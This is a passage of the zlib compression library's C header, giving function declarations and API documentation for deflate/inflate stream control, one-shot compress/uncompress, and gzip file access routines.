258 bytes long. If the application needs the last window-size bytes of input, then that would need to be saved by the application outside of zlib. deflateGetDictionary returns Z_OK on success, or Z_STREAM_ERROR if the stream state is inconsistent. 
*/ ZEXTERN int ZEXPORT deflateCopy(z_streamp dest, z_streamp source); /* Sets the destination stream as a complete copy of the source stream. This function can be useful when several compression strategies will be tried, for example when there are several ways of pre-processing the input data with a filter. The streams that will be discarded should then be freed by calling deflateEnd. Note that deflateCopy duplicates the internal compression state which can be quite large, so this strategy is slow and can consume lots of memory. deflateCopy returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_STREAM_ERROR if the source stream state was inconsistent (such as zalloc being Z_NULL). msg is left unchanged in both source and destination. */ ZEXTERN int ZEXPORT deflateReset(z_streamp strm); /* This function is equivalent to deflateEnd followed by deflateInit, but does not free and reallocate the internal compression state. The stream will leave the compression level and any other attributes that may have been set unchanged. total_in, total_out, adler, and msg are initialized. deflateReset returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent (such as zalloc or state being Z_NULL). */ ZEXTERN int ZEXPORT deflateParams(z_streamp strm, int level, int strategy); /* Dynamically update the compression level and compression strategy. The interpretation of level and strategy is as in deflateInit2(). This can be used to switch between compression and straight copy of the input data, or to switch to a different kind of input data requiring a different strategy. If the compression approach (which is a function of the level) or the strategy is changed, and if there have been any deflate() calls since the state was initialized or reset, then the input available so far is compressed with the old level and strategy using deflate(strm, Z_BLOCK). There are three approaches for the compression levels 0, 1..3, and 4..9 respectively. 
The new level and strategy will take effect at the next call of deflate(). If a deflate(strm, Z_BLOCK) is performed by deflateParams(), and it does not have enough output space to complete, then the parameter change will not take effect. In this case, deflateParams() can be called again with the same parameters and more output space to try again. In order to assure a change in the parameters on the first try, the deflate stream should be flushed using deflate() with Z_BLOCK or other flush request until strm.avail_out is not zero, before calling deflateParams(). Then no more input data should be provided before the deflateParams() call. If this is done, the old level and strategy will be applied to the data compressed before deflateParams(), and the new level and strategy will be applied to the data compressed after deflateParams(). deflateParams returns Z_OK on success, Z_STREAM_ERROR if the source stream state was inconsistent or if a parameter was invalid, or Z_BUF_ERROR if there was not enough output space to complete the compression of the available input data before a change in the strategy or approach. Note that in the case of a Z_BUF_ERROR, the parameters are not changed. A return value of Z_BUF_ERROR is not fatal, in which case deflateParams() can be retried with more output space. */ ZEXTERN int ZEXPORT deflateTune(z_streamp strm, int good_length, int max_lazy, int nice_length, int max_chain); /* Fine tune deflate's internal compression parameters. This should only be used by someone who understands the algorithm used by zlib's deflate for searching for the best matching string, and even then only by the most fanatic optimizer trying to squeeze out the last compressed bit for their specific input data. Read the deflate.c source code for the meaning of the max_lazy, good_length, nice_length, and max_chain parameters. 
deflateTune() can be called after deflateInit() or deflateInit2(), and returns Z_OK on success, or Z_STREAM_ERROR for an invalid deflate stream. */ ZEXTERN uLong ZEXPORT deflateBound(z_streamp strm, uLong sourceLen); /* deflateBound() returns an upper bound on the compressed size after deflation of sourceLen bytes. It must be called after deflateInit() or deflateInit2(), and after deflateSetHeader(), if used. This would be used to allocate an output buffer for deflation in a single pass, and so would be called before deflate(). If that first deflate() call is provided the sourceLen input bytes, an output buffer allocated to the size returned by deflateBound(), and the flush value Z_FINISH, then deflate() is guaranteed to return Z_STREAM_END. Note that it is possible for the compressed size to be larger than the value returned by deflateBound() if flush options other than Z_FINISH or Z_NO_FLUSH are used. */ ZEXTERN int ZEXPORT deflatePending(z_streamp strm, unsigned *pending, int *bits); /* deflatePending() returns the number of bytes and bits of output that have been generated, but not yet provided in the available output. The bytes not provided would be due to the available output space having been consumed. The number of bits of output not provided is between 0 and 7, where they await more bits to join them in order to fill out a full byte. If pending or bits are Z_NULL, then those values are not set. deflatePending returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent. */ ZEXTERN int ZEXPORT deflatePrime(z_streamp strm, int bits, int value); /* deflatePrime() inserts bits in the deflate output stream. The intent is that this function is used to start off the deflate output with the bits leftover from a previous deflate stream when appending to it. As such, this function can only be used for raw deflate, and must be used before the first deflate() call after a deflateInit2() or deflateReset(). 
bits must be less than or equal to 16, and that many of the least significant bits of value will be inserted in the output. deflatePrime returns Z_OK if success, Z_BUF_ERROR if there was not enough room in the internal buffer to insert the bits, or Z_STREAM_ERROR if the source stream state was inconsistent. */ ZEXTERN int ZEXPORT deflateSetHeader(z_streamp strm, gz_headerp head); /* deflateSetHeader() provides gzip header information for when a gzip stream is requested by deflateInit2(). deflateSetHeader() may be called after deflateInit2() or deflateReset() and before the first call of deflate(). The text, time, os, extra field, name, and comment information in the provided gz_header structure are written to the gzip header (xflag is ignored -- the extra flags are set according to the compression level). The caller must assure that, if not Z_NULL, name and comment are terminated with a zero byte, and that if extra is not Z_NULL, that extra_len bytes are available there. If hcrc is true, a gzip header crc is included. Note that the current versions of the command-line version of gzip (up through version 1.3.x) do not support header crc's, and will report that it is a "multi-part gzip file" and give up. If deflateSetHeader is not used, the default gzip header has text false, the time set to zero, and os set to the current operating system, with no extra, name, or comment fields. The gzip header is returned to the default state by deflateReset(). deflateSetHeader returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent. */ /* ZEXTERN int ZEXPORT inflateInit2(z_streamp strm, int windowBits); This is another version of inflateInit with an extra parameter. The fields next_in, avail_in, zalloc, zfree and opaque must be initialized before by the caller. The windowBits parameter is the base two logarithm of the maximum window size (the size of the history buffer). It should be in the range 8..15 for this version of the library. 
The default value is 15 if inflateInit is used instead. windowBits must be greater than or equal to the windowBits value provided to deflateInit2() while compressing, or it must be equal to 15 if deflateInit2() was not used. If a compressed stream with a larger window size is given as input, inflate() will return with the error code Z_DATA_ERROR instead of trying to allocate a larger window. windowBits can also be zero to request that inflate use the window size in the zlib header of the compressed stream. windowBits can also be -8..-15 for raw inflate. In this case, -windowBits determines the window size. inflate() will then process raw deflate data, not looking for a zlib or gzip header, not generating a check value, and not looking for any check values for comparison at the end of the stream. This is for use with other formats that use the deflate compressed data format such as zip. Those formats provide their own check values. If a custom format is developed using the raw deflate format for compressed data, it is recommended that a check value such as an Adler-32 or a CRC-32 be applied to the uncompressed data as is done in the zlib, gzip, and zip formats. For most applications, the zlib format should be used as is. Note that comments above on the use in deflateInit2() applies to the magnitude of windowBits. windowBits can also be greater than 15 for optional gzip decoding. Add 32 to windowBits to enable zlib and gzip decoding with automatic header detection, or add 16 to decode only the gzip format (the zlib format will return a Z_DATA_ERROR). If a gzip stream is being decoded, strm->adler is a CRC-32 instead of an Adler-32. Unlike the gunzip utility and gzread() (see below), inflate() will *not* automatically decode concatenated gzip members. inflate() will return Z_STREAM_END at the end of the gzip member. The state would need to be reset to continue decoding a subsequent gzip member. 
This *must* be done if there is more data after a gzip member, in order for the decompression to be compliant with the gzip standard (RFC 1952). inflateInit2 returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_VERSION_ERROR if the zlib library version is incompatible with the version assumed by the caller, or Z_STREAM_ERROR if the parameters are invalid, such as a null pointer to the structure. msg is set to null if there is no error message. inflateInit2 does not perform any decompression apart from possibly reading the zlib header if present: actual decompression will be done by inflate(). (So next_in and avail_in may be modified, but next_out and avail_out are unused and unchanged.) The current implementation of inflateInit2() does not process any header information -- that is deferred until inflate() is called. */ ZEXTERN int ZEXPORT inflateSetDictionary(z_streamp strm, const Bytef *dictionary, uInt dictLength); /* Initializes the decompression dictionary from the given uncompressed byte sequence. This function must be called immediately after a call of inflate, if that call returned Z_NEED_DICT. The dictionary chosen by the compressor can be determined from the Adler-32 value returned by that call of inflate. The compressor and decompressor must use exactly the same dictionary (see deflateSetDictionary). For raw inflate, this function can be called at any time to set the dictionary. If the provided dictionary is smaller than the window and there is already data in the window, then the provided dictionary will amend what's there. The application must ensure that the dictionary that was used for compression is provided. inflateSetDictionary returns Z_OK if success, Z_STREAM_ERROR if a parameter is invalid (e.g. dictionary being Z_NULL) or the stream state is inconsistent, Z_DATA_ERROR if the given dictionary doesn't match the expected one (incorrect Adler-32 value). 
inflateSetDictionary does not perform any decompression: this will be done by subsequent calls of inflate(). */ ZEXTERN int ZEXPORT inflateGetDictionary(z_streamp strm, Bytef *dictionary, uInt *dictLength); /* Returns the sliding dictionary being maintained by inflate. dictLength is set to the number of bytes in the dictionary, and that many bytes are copied to dictionary. dictionary must have enough space, where 32768 bytes is always enough. If inflateGetDictionary() is called with dictionary equal to Z_NULL, then only the dictionary length is returned, and nothing is copied. Similarly, if dictLength is Z_NULL, then it is not set. inflateGetDictionary returns Z_OK on success, or Z_STREAM_ERROR if the stream state is inconsistent. */ ZEXTERN int ZEXPORT inflateSync(z_streamp strm); /* Skips invalid compressed data until a possible full flush point (see above for the description of deflate with Z_FULL_FLUSH) can be found, or until all available input is skipped. No output is provided. inflateSync searches for a 00 00 FF FF pattern in the compressed data. All full flush points have this pattern, but not all occurrences of this pattern are full flush points. inflateSync returns Z_OK if a possible full flush point has been found, Z_BUF_ERROR if no more input was provided, Z_DATA_ERROR if no flush point has been found, or Z_STREAM_ERROR if the stream structure was inconsistent. In the success case, the application may save the current value of total_in which indicates where valid compressed data was found. In the error case, the application may repeatedly call inflateSync, providing more input each time, until success or end of the input data. */ ZEXTERN int ZEXPORT inflateCopy(z_streamp dest, z_streamp source); /* Sets the destination stream as a complete copy of the source stream. This function can be useful when randomly accessing a large stream. 
The first pass through the stream can periodically record the inflate state, allowing restarting inflate at those points when randomly accessing the stream. inflateCopy returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_STREAM_ERROR if the source stream state was inconsistent (such as zalloc being Z_NULL). msg is left unchanged in both source and destination. */ ZEXTERN int ZEXPORT inflateReset(z_streamp strm); /* This function is equivalent to inflateEnd followed by inflateInit, but does not free and reallocate the internal decompression state. The stream will keep attributes that may have been set by inflateInit2. total_in, total_out, adler, and msg are initialized. inflateReset returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent (such as zalloc or state being Z_NULL). */ ZEXTERN int ZEXPORT inflateReset2(z_streamp strm, int windowBits); /* This function is the same as inflateReset, but it also permits changing the wrap and window size requests. The windowBits parameter is interpreted the same as it is for inflateInit2. If the window size is changed, then the memory allocated for the window is freed, and the window will be reallocated by inflate() if needed. inflateReset2 returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent (such as zalloc or state being Z_NULL), or if the windowBits parameter is invalid. */ ZEXTERN int ZEXPORT inflatePrime(z_streamp strm, int bits, int value); /* This function inserts bits in the inflate input stream. The intent is that this function is used to start inflating at a bit position in the middle of a byte. The provided bits will be used before any bytes are used from next_in. This function should only be used with raw inflate, and should be used before the first inflate() call after inflateInit2() or inflateReset(). bits must be less than or equal to 16, and that many of the least significant bits of value will be inserted in the input. 
If bits is negative, then the input stream bit buffer is emptied. Then inflatePrime() can be called again to put bits in the buffer. This is used to clear out bits leftover after feeding inflate a block description prior to feeding inflate codes. inflatePrime returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent. */ ZEXTERN long ZEXPORT inflateMark(z_streamp strm); /* This function returns two values, one in the lower 16 bits of the return value, and the other in the remaining upper bits, obtained by shifting the return value down 16 bits. If the upper value is -1 and the lower value is zero, then inflate() is currently decoding information outside of a block. If the upper value is -1 and the lower value is non-zero, then inflate is in the middle of a stored block, with the lower value equaling the number of bytes from the input remaining to copy. If the upper value is not -1, then it is the number of bits back from the current bit position in the input of the code (literal or length/distance pair) currently being processed. In that case the lower value is the number of bytes already emitted for that code. A code is being processed if inflate is waiting for more input to complete decoding of the code, or if it has completed decoding but is waiting for more output space to write the literal or match data. inflateMark() is used to mark locations in the input data for random access, which may be at bit positions, and to note those cases where the output of a code may span boundaries of random access blocks. The current location in the input stream can be determined from avail_in and data_type as noted in the description for the Z_BLOCK flush parameter for inflate. inflateMark returns the value noted above, or -65536 if the provided source stream state was inconsistent. 
*/ ZEXTERN int ZEXPORT inflateGetHeader(z_streamp strm, gz_headerp head); /* inflateGetHeader() requests that gzip header information be stored in the provided gz_header structure. inflateGetHeader() may be called after inflateInit2() or inflateReset(), and before the first call of inflate(). As inflate() processes the gzip stream, head->done is zero until the header is completed, at which time head->done is set to one. If a zlib stream is being decoded, then head->done is set to -1 to indicate that there will be no gzip header information forthcoming. Note that Z_BLOCK or Z_TREES can be used to force inflate() to return immediately after header processing is complete and before any actual data is decompressed. The text, time, xflags, and os fields are filled in with the gzip header contents. hcrc is set to true if there is a header CRC. (The header CRC was valid if done is set to one.) If extra is not Z_NULL, then extra_max contains the maximum number of bytes to write to extra. Once done is true, extra_len contains the actual extra field length, and extra contains the extra field, or that field truncated if extra_max is less than extra_len. If name is not Z_NULL, then up to name_max characters are written there, terminated with a zero unless the length is greater than name_max. If comment is not Z_NULL, then up to comm_max characters are written there, terminated with a zero unless the length is greater than comm_max. In either case the buffer is not zero-terminated when the field is too long, so check for the terminator before treating name or comment as a C string. When any of extra, name, or comment are not Z_NULL and the respective field is not present in the header, then that field is set to Z_NULL to signal its absence. This allows the use of deflateSetHeader() with the returned structure to duplicate the header. However if those fields are set to allocated memory, then the application will need to save those pointers elsewhere so that they can be eventually freed. If inflateGetHeader is not used, then the header information is simply discarded. 
The header is always checked for validity, including the header CRC if present. inflateReset() will reset the process to discard the header information. The application would need to call inflateGetHeader() again to retrieve the header from the next gzip stream. inflateGetHeader returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent. */ /* ZEXTERN int ZEXPORT inflateBackInit(z_streamp strm, int windowBits, unsigned char FAR *window); Initialize the internal stream state for decompression using inflateBack() calls. The fields zalloc, zfree and opaque in strm must be initialized before the call. If zalloc and zfree are Z_NULL, then the default library- derived memory allocation routines are used. windowBits is the base two logarithm of the window size, in the range 8..15. window is a caller supplied buffer of that size. Except for special applications where it is assured that deflate was used with small window sizes, windowBits must be 15 and a 32K byte window must be supplied to be able to decompress general deflate streams. See inflateBack() for the usage of these routines. inflateBackInit will return Z_OK on success, Z_STREAM_ERROR if any of the parameters are invalid, Z_MEM_ERROR if the internal state could not be allocated, or Z_VERSION_ERROR if the version of the library does not match the version of the header file. */ typedef unsigned (*in_func)(void FAR *, z_const unsigned char FAR * FAR *); typedef int (*out_func)(void FAR *, unsigned char FAR *, unsigned); ZEXTERN int ZEXPORT inflateBack(z_streamp strm, in_func in, void FAR *in_desc, out_func out, void FAR *out_desc); /* inflateBack() does a raw inflate with a single call using a call-back interface for input and output. This is potentially more efficient than inflate() for file i/o applications, in that it avoids copying between the output and the sliding window by simply making the window itself the output buffer. 
inflate() can be faster on modern CPUs when used with large buffers. inflateBack() trusts the application to not change the output buffer passed by the output function, at least until inflateBack() returns. inflateBackInit() must be called first to allocate the internal state and to initialize the state with the user-provided window buffer. inflateBack() may then be used multiple times to inflate a complete, raw deflate stream with each call. inflateBackEnd() is then called to free the allocated state. A raw deflate stream is one with no zlib or gzip header or trailer. This routine would normally be used in a utility that reads zip or gzip files and writes out uncompressed files. The utility would decode the header and process the trailer on its own, hence this routine expects only the raw deflate stream to decompress. This is different from the default behavior of inflate(), which expects a zlib header and trailer around the deflate stream. inflateBack() uses two subroutines supplied by the caller that are then called by inflateBack() for input and output. inflateBack() calls those routines until it reads a complete deflate stream and writes out all of the uncompressed data, or until it encounters an error. The function's parameters and return types are defined above in the in_func and out_func typedefs. inflateBack() will call in(in_desc, &buf) which should return the number of bytes of provided input, and a pointer to that input in buf. If there is no input available, in() must return zero -- buf is ignored in that case -- and inflateBack() will return a buffer error. inflateBack() will call out(out_desc, buf, len) to write the uncompressed data buf[0..len-1]. out() should return zero on success, or non-zero on failure. If out() returns non-zero, inflateBack() will return with an error. Neither in() nor out() are permitted to change the contents of the window provided to inflateBackInit(), which is also the buffer that out() uses to write from. 
The length written by out() will be at most the window size. Any non-zero amount of input may be provided by in(). For convenience, inflateBack() can be provided input on the first call by setting strm->next_in and strm->avail_in. If that input is exhausted, then in() will be called. Therefore strm->next_in must be initialized before calling inflateBack(). If strm->next_in is Z_NULL, then in() will be called immediately for input. If strm->next_in is not Z_NULL, then strm->avail_in must also be initialized, and then if strm->avail_in is not zero, input will initially be taken from strm->next_in[0 .. strm->avail_in - 1]. The in_desc and out_desc parameters of inflateBack() are passed as the first parameter of in() and out() respectively when they are called. These descriptors can be optionally used to pass any information that the caller- supplied in() and out() functions need to do their job. On return, inflateBack() will set strm->next_in and strm->avail_in to pass back any unused input that was provided by the last in() call. The return values of inflateBack() can be Z_STREAM_END on success, Z_BUF_ERROR if in() or out() returned an error, Z_DATA_ERROR if there was a format error in the deflate stream (in which case strm->msg is set to indicate the nature of the error), or Z_STREAM_ERROR if the stream was not properly initialized. In the case of Z_BUF_ERROR, an input or output error can be distinguished using strm->next_in which will be Z_NULL only if in() returned an error. If strm->next_in is not Z_NULL, then the Z_BUF_ERROR was due to out() returning non-zero. (in() will always be called before out(), so strm->next_in is assured to be defined if out() returns non-zero.) Note that inflateBack() cannot return Z_OK. */ ZEXTERN int ZEXPORT inflateBackEnd(z_streamp strm); /* All memory allocated by inflateBackInit() is freed. inflateBackEnd() returns Z_OK on success, or Z_STREAM_ERROR if the stream state was inconsistent. 
*/ ZEXTERN uLong ZEXPORT zlibCompileFlags(void); /* Return flags indicating compile-time options. Type sizes, two bits each, 00 = 16 bits, 01 = 32, 10 = 64, 11 = other: 1.0: size of uInt 3.2: size of uLong 5.4: size of voidpf (pointer) 7.6: size of z_off_t Compiler, assembler, and debug options: 8: ZLIB_DEBUG 9: ASMV or ASMINF -- use ASM code 10: ZLIB_WINAPI -- exported functions use the WINAPI calling convention 11: 0 (reserved) One-time table building (smaller code, but not thread-safe if true): 12: BUILDFIXED -- build static block decoding tables when needed 13: DYNAMIC_CRC_TABLE -- build CRC calculation tables when needed 14,15: 0 (reserved) Library content (indicates missing functionality): 16: NO_GZCOMPRESS -- gz* functions cannot compress (to avoid linking deflate code when not needed) 17: NO_GZIP -- deflate can't write gzip streams, and inflate can't detect and decode gzip streams (to avoid linking crc code) 18-19: 0 (reserved) Operation variations (changes in library functionality): 20: PKZIP_BUG_WORKAROUND -- slightly more permissive inflate 21: FASTEST -- deflate algorithm with only one, lowest compression level 22,23: 0 (reserved) The sprintf variant used by gzprintf (zero is best): 24: 0 = vs*, 1 = s* -- 1 means limited to 20 arguments after the format 25: 0 = *nprintf, 1 = *printf -- 1 means gzprintf() not secure! 26: 0 = returns value, 1 = void -- 1 means inferred string length returned Remainder: 27-31: 0 (reserved) */ #ifndef Z_SOLO /* utility functions */ /* The following utility functions are implemented on top of the basic stream-oriented functions. To simplify the interface, some default options are assumed (compression level and memory usage, standard memory allocation functions). The source code of these utility functions can be modified if you need special options. */ ZEXTERN int ZEXPORT compress(Bytef *dest, uLongf *destLen, const Bytef *source, uLong sourceLen); /* Compresses the source buffer into the destination buffer. 
sourceLen is the byte length of the source buffer. Upon entry, destLen is the total size of the destination buffer, which must be at least the value returned by compressBound(sourceLen). Upon exit, destLen is the actual size of the compressed data. compress() is equivalent to compress2() with a level parameter of Z_DEFAULT_COMPRESSION. compress returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_BUF_ERROR if there was not enough room in the output buffer. */ ZEXTERN int ZEXPORT compress2(Bytef *dest, uLongf *destLen, const Bytef *source, uLong sourceLen, int level); /* Compresses the source buffer into the destination buffer. The level parameter has the same meaning as in deflateInit. sourceLen is the byte length of the source buffer. Upon entry, destLen is the total size of the destination buffer, which must be at least the value returned by compressBound(sourceLen). Upon exit, destLen is the actual size of the compressed data. compress2 returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_BUF_ERROR if there was not enough room in the output buffer, Z_STREAM_ERROR if the level parameter is invalid. */ ZEXTERN uLong ZEXPORT compressBound(uLong sourceLen); /* compressBound() returns an upper bound on the compressed size after compress() or compress2() on sourceLen bytes. It would be used before a compress() or compress2() call to allocate the destination buffer. */ ZEXTERN int ZEXPORT uncompress(Bytef *dest, uLongf *destLen, const Bytef *source, uLong sourceLen); /* Decompresses the source buffer into the destination buffer. sourceLen is the byte length of the source buffer. Upon entry, destLen is the total size of the destination buffer, which must be large enough to hold the entire uncompressed data. (The size of the uncompressed data must have been saved previously by the compressor and transmitted to the decompressor by some mechanism outside the scope of this compression library.) 
Upon exit, destLen is the actual size of the uncompressed data. uncompress returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_BUF_ERROR if there was not enough room in the output buffer, or Z_DATA_ERROR if the input data was corrupted or incomplete. In the case where there is not enough room, uncompress() will fill the output buffer with the uncompressed data up to that point. */ ZEXTERN int ZEXPORT uncompress2(Bytef *dest, uLongf *destLen, const Bytef *source, uLong *sourceLen); /* Same as uncompress, except that sourceLen is a pointer, where the length of the source is *sourceLen. On return, *sourceLen is the number of source bytes consumed. */ /* gzip file access functions */ /* This library supports reading and writing files in gzip (.gz) format with an interface similar to that of stdio, using the functions that start with "gz". The gzip format is different from the zlib format. gzip is a gzip wrapper, documented in RFC 1952, wrapped around a deflate stream. */ typedef struct gzFile_s *gzFile; /* semi-opaque gzip file descriptor */ /* ZEXTERN gzFile ZEXPORT gzopen(const char *path, const char *mode); Open the gzip (.gz) file at path for reading and decompressing, or compressing and writing. The mode parameter is as in fopen ("rb" or "wb") but can also include a compression level ("wb9") or a strategy: 'f' for filtered data as in "wb6f", 'h' for Huffman-only compression as in "wb1h", 'R' for run-length encoding as in "wb1R", or 'F' for fixed code compression as in "wb9F". (See the description of deflateInit2 for more information about the strategy parameter.) 'T' will request transparent writing or appending with no compression and not using the gzip format. "a" can be used instead of "w" to request that the gzip stream that will be written be appended to the file. "+" will result in an error, since reading and writing to the same gzip file is not supported. 
The addition of "x" when writing will create the file exclusively, which fails if the file already exists. On systems that support it, the addition of "e" when reading or writing will set the flag to close the file on an execve() call. These functions, as well as gzip, will read and decode a sequence of gzip streams in a file. The append function of gzopen() can be used to create such a file. (Also see gzflush() for another way to do this.) When appending, gzopen does not test whether the file begins with a gzip stream, nor does it look for the end of the gzip streams to begin appending. gzopen will simply append a gzip stream to the existing file. gzopen can be used to read a file which is not in gzip format; in this case gzread will directly read from the file without decompression. When reading, this will be detected automatically by looking for the magic two- byte gzip header. gzopen returns NULL if the file could not be opened, if there was insufficient memory to allocate the gzFile state, or if an invalid mode was specified (an 'r', 'w', or 'a' was not provided, or '+' was provided). errno can be checked to determine if the reason gzopen failed was that the file could not be opened. */ ZEXTERN gzFile ZEXPORT gzdopen(int fd, const char *mode); /* Associate a gzFile with the file descriptor fd. File descriptors are obtained from calls like open, dup, creat, pipe or fileno (if the file has been previously opened with fopen). The mode parameter is as in gzopen. The next call of gzclose on the returned gzFile will also close the file descriptor fd, just like fclose(fdopen(fd, mode)) closes the file descriptor fd. If you want to keep fd open, use fd = dup(fd_keep); gz = gzdopen(fd, mode);. The duplicated descriptor should be saved to avoid a leak, since gzdopen does not close fd if it fails. If you are using fileno() to get the file descriptor from a FILE *, then you will have to use dup() to avoid double-close()ing the file descriptor. 
Both gzclose() and fclose() will close the associated file descriptor, so they need to have different file descriptors. gzdopen returns NULL if there was insufficient memory to allocate the gzFile state, if an invalid mode was specified (an 'r', 'w', or 'a' was not provided, or '+' was provided), or if fd is -1. The file descriptor is not used until the next gz* read, write, seek, or close operation, so gzdopen will not detect if fd is invalid (unless fd is -1). */ ZEXTERN int ZEXPORT gzbuffer(gzFile file, unsigned size); /* Set the internal buffer size used by this library's functions for file to size. The default buffer size is 8192 bytes. This function must be called after gzopen() or gzdopen(), and before any other calls that read or write the file. The buffer memory allocation is always deferred to the first read or write. Three times that size in buffer space is allocated. A larger buffer size of, for example, 64K or 128K bytes will noticeably increase the speed of decompression (reading). The new buffer size also affects the maximum length for gzprintf(). gzbuffer() returns 0 on success, or -1 on failure, such as being called too late. */ ZEXTERN int ZEXPORT gzsetparams(gzFile file, int level, int strategy); /* Dynamically update the compression level and strategy for file. See the description of deflateInit2 for the meaning of these parameters. Previously provided data is flushed before applying the parameter changes. gzsetparams returns Z_OK if success, Z_STREAM_ERROR if the file was not opened for writing, Z_ERRNO if there is an error writing the flushed data, or Z_MEM_ERROR if there is a memory allocation error. */ ZEXTERN int ZEXPORT gzread(gzFile file, voidp buf, unsigned len); /* Read and decompress up to len uncompressed bytes from file into buf. If the input file is not in gzip format, gzread copies the given number of bytes into the buffer directly from the file. 
After reaching the end of a gzip stream in the input, gzread will continue to read, looking for another gzip stream. Any number of gzip streams may be concatenated in the input file, and will all be decompressed by gzread(). If something other than a gzip stream is encountered after a gzip stream, that remaining trailing garbage is ignored (and no error is returned). gzread can be used to read a gzip file that is being concurrently written. Upon reaching the end of the input, gzread will return with the available data. If the error code returned by gzerror is Z_OK or Z_BUF_ERROR, then gzclearerr can be used to clear the end of file indicator in order to permit gzread to be tried again. Z_OK indicates that a gzip stream was completed on the last gzread. Z_BUF_ERROR indicates that the input file ended in the middle of a gzip stream. Note that gzread does not return -1 in the event of an incomplete gzip stream. This error is deferred until gzclose(), which will return Z_BUF_ERROR if the last gzread ended in the middle of a gzip stream. Alternatively, gzerror can be used before gzclose to detect this case. gzread returns the number of uncompressed bytes actually read, less than len for end of file, or -1 for error. If len is too large to fit in an int, then nothing is read, -1 is returned, and the error state is set to Z_STREAM_ERROR. */ ZEXTERN z_size_t ZEXPORT gzfread(voidp buf, z_size_t size, z_size_t nitems, gzFile file); /* Read and decompress up to nitems items of size size from file into buf, otherwise operating as gzread() does. This duplicates the interface of stdio's fread(), with size_t request and return types. If the library defines size_t, then z_size_t is identical to size_t. If not, then z_size_t is an unsigned integer type that can contain a pointer. gzfread() returns the number of full items read of size size, or zero if the end of the file was reached and a full item could not be read, or if there was an error. 
gzerror() must be consulted if zero is returned in order to determine if there was an error. If the multiplication of size and nitems overflows, i.e. the product does not fit in a z_size_t, then nothing is read, zero is returned, and the error state is set to Z_STREAM_ERROR. In the event that the end of file is reached and only a partial item is available at the end, i.e. the remaining uncompressed data length is not a multiple of size, then the final partial item is nevertheless read into buf and the end-of-file flag is set. The length of the partial item read is not provided, but could be inferred from the result of gztell(). This behavior is the same as the behavior of fread() implementations in common libraries, but it prevents the direct use of gzfread() to read a concurrently written file, resetting and retrying on end-of-file, when size is not 1. */ ZEXTERN int ZEXPORT gzwrite(gzFile file, voidpc buf, unsigned len); /* Compress and write the len uncompressed bytes at buf to file. gzwrite returns the number of uncompressed bytes written or 0 in case of error. */ ZEXTERN z_size_t ZEXPORT gzfwrite(voidpc buf, z_size_t size, z_size_t nitems, gzFile file); /* Compress and write nitems items of size size from buf to file, duplicating the interface of stdio's fwrite(), with size_t request and return types. If the library defines size_t, then z_size_t is identical to size_t. If not, then z_size_t is an unsigned integer type that can contain a pointer. gzfwrite() returns the number of full items written of size size, or zero if there was an error. If the multiplication of size and nitems overflows, i.e. the product does not fit in a z_size_t, then nothing is written, zero is returned, and the error state is set to Z_STREAM_ERROR. */ ZEXTERN int ZEXPORTVA gzprintf(gzFile file, const char *format, ...); /* Convert, format, compress, and write the arguments (...) to file under control of the string format, as in fprintf. 
gzprintf returns the number of uncompressed bytes actually written, or a negative zlib error code in case of error. The number of uncompressed bytes written is limited to 8191, or one less than the buffer size given to gzbuffer(). The caller should assure that this limit is not exceeded. If it is exceeded, then gzprintf() will return an error (0) with nothing written. In this case, there may also be a buffer overflow with unpredictable consequences, which is possible only if zlib was compiled with the insecure functions sprintf() or vsprintf(), because the secure snprintf() or vsnprintf() functions were not available. This can be determined using zlibCompileFlags(). */ ZEXTERN int ZEXPORT gzputs(gzFile file, const char *s); /* Compress and write the given null-terminated string s to file, excluding the terminating null character. gzputs returns the number of characters written, or -1 in case of error. */ ZEXTERN char * ZEXPORT gzgets(gzFile file, char *buf, int len); /* Read and decompress bytes from file into buf, until len-1 characters are read, or until a newline character is read and transferred to buf, or an end-of-file condition is encountered. If any characters are read or if len is one, the string is terminated with a null character. If no characters are read due to an end-of-file or len is less than one, then the buffer is left untouched. gzgets returns buf which is a null-terminated string, or it returns NULL for end-of-file or in case of error. If there was an error, the contents at buf are indeterminate. */ ZEXTERN int ZEXPORT gzputc(gzFile file, int c); /* Compress and write c, converted to an unsigned char, into file. gzputc returns the value that was written, or -1 in case of error. */ ZEXTERN int ZEXPORT gzgetc(gzFile file); /* Read and decompress one byte from file. gzgetc returns this byte or -1 in case of end of file or error. This is implemented as a macro for speed. As such, it does not do all of the checking the other functions do. I.e. 
it does not check to see if file is NULL, nor whether the structure file points to has been clobbered or not. */ ZEXTERN int ZEXPORT gzungetc(int c, gzFile file); /* Push c back onto the stream for file to be read as the first character on the next read. At least one character of push-back is always allowed. gzungetc() returns the character pushed, or -1 on failure. gzungetc() will fail if c is -1, and may fail if a character has been pushed but not read yet. If gzungetc is used immediately after gzopen or gzdopen, at least the output buffer size of pushed characters is allowed. (See gzbuffer above.) The pushed character will be discarded if the stream is repositioned with gzseek() or gzrewind(). */ ZEXTERN int ZEXPORT gzflush(gzFile file, int flush); /* Flush all pending output to file. The parameter flush is as in the deflate() function. The return value is the zlib error number (see function gzerror below). gzflush is only permitted when writing. If the flush parameter is Z_FINISH, the remaining data is written and the gzip stream is completed in the output. If gzwrite() is called again, a new gzip stream will be started in the output. gzread() is able to read such concatenated gzip streams. gzflush should be called only when strictly necessary because it will degrade compression if called too often. */ /* ZEXTERN z_off_t ZEXPORT gzseek(gzFile file, z_off_t offset, int whence); Set the starting position to offset relative to whence for the next gzread or gzwrite on file. The offset represents a number of bytes in the uncompressed data stream. The whence parameter is defined as in lseek(2); the value SEEK_END is not supported. If the file is opened for reading, this function is emulated but can be extremely slow. If the file is opened for writing, only forward seeks are supported; gzseek then compresses a sequence of zeroes up to the new starting position. 
